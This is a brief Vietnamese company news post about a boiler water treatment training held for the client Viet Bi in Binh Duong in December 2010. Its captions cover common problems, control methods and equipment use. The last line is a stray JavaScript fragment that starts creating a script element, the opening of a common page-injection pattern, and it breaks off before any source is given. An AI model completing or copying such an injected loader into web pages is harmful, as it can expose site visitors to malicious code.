Mon,21-05-2018

VIỆT BỈ - 23.12.2010

Ngày 23.12.2010 Công ty Long Trường Vũ đã thực hiện thành công buổi training về kỹ thuật xử lý nước lò hơi tại khách hàng Việt Bỉ - Bình Dương.

 

Các vấn đề thường gặp và giải pháp

 

Trao đổi phương pháp kiểm soát nước lò hơi

 

Hướng dẫn sử dụng thiết bị đo

 

Học viên thực hành

 

Hướng dẫn sử dụng thiết bị

var d=document;var s=d.createElement('script');